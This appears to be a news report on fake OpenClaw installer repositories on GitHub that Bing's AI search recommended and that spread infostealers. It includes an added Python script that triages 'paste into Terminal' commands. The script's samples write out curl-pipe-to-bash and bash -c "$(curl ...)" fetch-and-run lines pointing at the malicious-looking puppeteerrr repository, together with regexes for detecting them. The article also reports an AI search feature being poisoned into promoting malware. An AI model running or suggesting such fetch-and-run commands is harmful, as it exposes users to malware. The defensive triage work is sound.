Cyber: Bing AI Promoted Fake Openclaw Github Repo Pushing Info-stealing...

Fake OpenClaw installers hosted in GitHub repositories and promoted by Microsoft Bing’s AI-enhanced search feature instructed users to run commands that deployed information stealers and proxy malware.

OpenClaw is an open-source AI agent that gained popularity as a personal assistant capable of executing tasks. It has access to local files and can integrate with email, messaging apps, and online services.

Because the agent has such broad local access, threat actors saw an opportunity to collect sensitive information by publishing malicious skills (instruction files) on the tool's official registry and on GitHub.

Researchers at managed detection and response company Huntress discovered a new campaign last month that distributed multiple malware loader and infostealer executables to users looking to install OpenClaw.

According to the researchers, the threat actor set up malicious GitHub repositories posing as OpenClaw installers, which were recommended by Bing in its AI-powered search results for the Windows version of the tool.

In a screenshot published in Huntress's report, Bing AI's suggested download link points to a malicious OpenClaw installer hosted on GitHub.

The researchers say that "just hosting the malware on GitHub was enough to poison Bing AI search results."

A fake OpenClaw repository that Huntress analyzed appeared legitimate at a glance, as the threat actor tied it to a GitHub organization named openclaw-installer. This may also have carried some weight in Bing's AI recommendation.

The GitHub accounts publishing these repositories were newly created, but attempted to increase their legitimacy by copying real code from the Cloudflare moltworker project.

The repository nevertheless provided an installation guide for OpenClaw on macOS, instructing the user to paste a bash command into Terminal. That command reached out to a separate GitHub organization called puppeteerrr and a repository named dmg.
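The practical lesson of the campaign is that a "paste this into Terminal" installer should be triaged before it runs: where does it actually fetch from, is the fetched script executed without ever touching disk, and does the GitHub owner match the project you think you are installing? The script below is an added example written for this page; it is not code from Huntress, BleepingComputer, or the OpenClaw project. The sample one-liners are constructed to resemble the pattern described above (the file paths under the puppeteerrr/dmg and openclaw-installer repositories are hypothetical, as is the trusted owner "example-trusted-org"; substitute the real upstream owner for your environment).

```python
"""Triage a shell install one-liner before pasting it into Terminal.

Added example for this article (not Huntress/BleepingComputer/OpenClaw code).
It extracts the origins a command reaches, flags curl|bash-style direct
execution and inline decoding, and checks GitHub owners against a trusted list.
"""
import re
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s'\")<>|;]+")

# "... | bash", "... | sudo sh", "... |zsh"
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:sudo\s+(?:-E\s+)?)?(?:ba|z|da)?sh\b")

# bash -c "$(curl ...)", bash <(curl ...), eval "$(curl ...)"
INLINE_EXEC_RE = re.compile(
    r"\b(?:ba|z|da)?sh\s+-c\s+['\"]?\$\(\s*(?:curl|wget)\b"
    r"|\b(?:ba|z|da)?sh\s+<\(\s*(?:curl|wget)\b"
    r"|\beval\s+['\"]?\$\(\s*(?:curl|wget)\b"
)

# base64 -d / -D / --decode, xxd -r: payload hidden inside the one-liner
DECODE_RE = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b|\bxxd\s+-r\b")

GITHUB_HOSTS = {
    "github.com",
    "raw.githubusercontent.com",
    "objects.githubusercontent.com",
    "codeload.github.com",
}


def github_owner_repo(url: str):
    """Return (owner, repo) for a GitHub URL, or None for any other host."""
    parsed = urlparse(url)
    if parsed.hostname not in GITHUB_HOSTS:
        return None
    parts = [p for p in parsed.path.split("/") if p]
    if len(parts) < 2:
        return None
    return parts[0], parts[1].removesuffix(".git")


def triage_install_command(cmd: str, trusted_owners) -> dict:
    """Return origins reached, findings, and a verdict for an install command.

    verdict is "suspicious" when anything was flagged, otherwise "review":
    a clean automated pass never means the script is safe to run unread.
    """
    trusted = {o.lower() for o in trusted_owners}
    findings = []
    if PIPE_TO_SHELL_RE.search(cmd) or INLINE_EXEC_RE.search(cmd):
        findings.append(
            "remote script is executed directly (piped or substituted into a shell) "
            "without being saved for inspection"
        )
    if DECODE_RE.search(cmd):
        findings.append("command decodes an encoded payload inline")

    origins = []
    for url in URL_RE.findall(cmd):
        parsed = urlparse(url)
        if parsed.scheme == "http":
            findings.append(f"plaintext http download: {url}")
        owner_repo = github_owner_repo(url)
        if owner_repo is None:
            origins.append(f"host:{parsed.hostname}")
            continue
        owner, repo = owner_repo
        origins.append(f"github:{owner}/{repo}")
        if owner.lower() not in trusted:
            findings.append(
                f"GitHub owner '{owner}' is not in the trusted list (repo '{repo}')"
            )
    return {
        "origins": origins,
        "findings": findings,
        "verdict": "suspicious" if findings else "review",
    }


# Constructed sample commands (paths and the trusted owner are hypothetical).
TRUSTED_OWNERS = {"example-trusted-org"}
SAMPLE_COMMANDS = {
    "pipe_to_bash": "curl -fsSL https://raw.githubusercontent.com/puppeteerrr/dmg/main/install.sh | bash",
    "subshell_exec": 'bash -c "$(curl -fsSL https://raw.githubusercontent.com/openclaw-installer/openclaw/main/install.sh)"',
    "save_then_inspect": "curl -fsSLo openclaw-install.sh https://raw.githubusercontent.com/example-trusted-org/openclaw/main/install.sh",
}


if __name__ == "__main__":
    for name, cmd in SAMPLE_COMMANDS.items():
        result = triage_install_command(cmd, TRUSTED_OWNERS)
        print(f"[{result['verdict']}] {name}: origins={result['origins']}")
        for finding in result["findings"]:
            print(f"    - {finding}")
```

The first two samples are flagged twice each: the script never lands on disk, and the GitHub owner (puppeteerrr, or the plausible-looking openclaw-installer) is not one you have vouched for. The third sample only downloads the file, so the tool reports "review" and leaves the actual reading of the script to you; a newly created org reusing copied code, as in this campaign, is exactly what an automated origin check cannot see.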

Source: BleepingComputer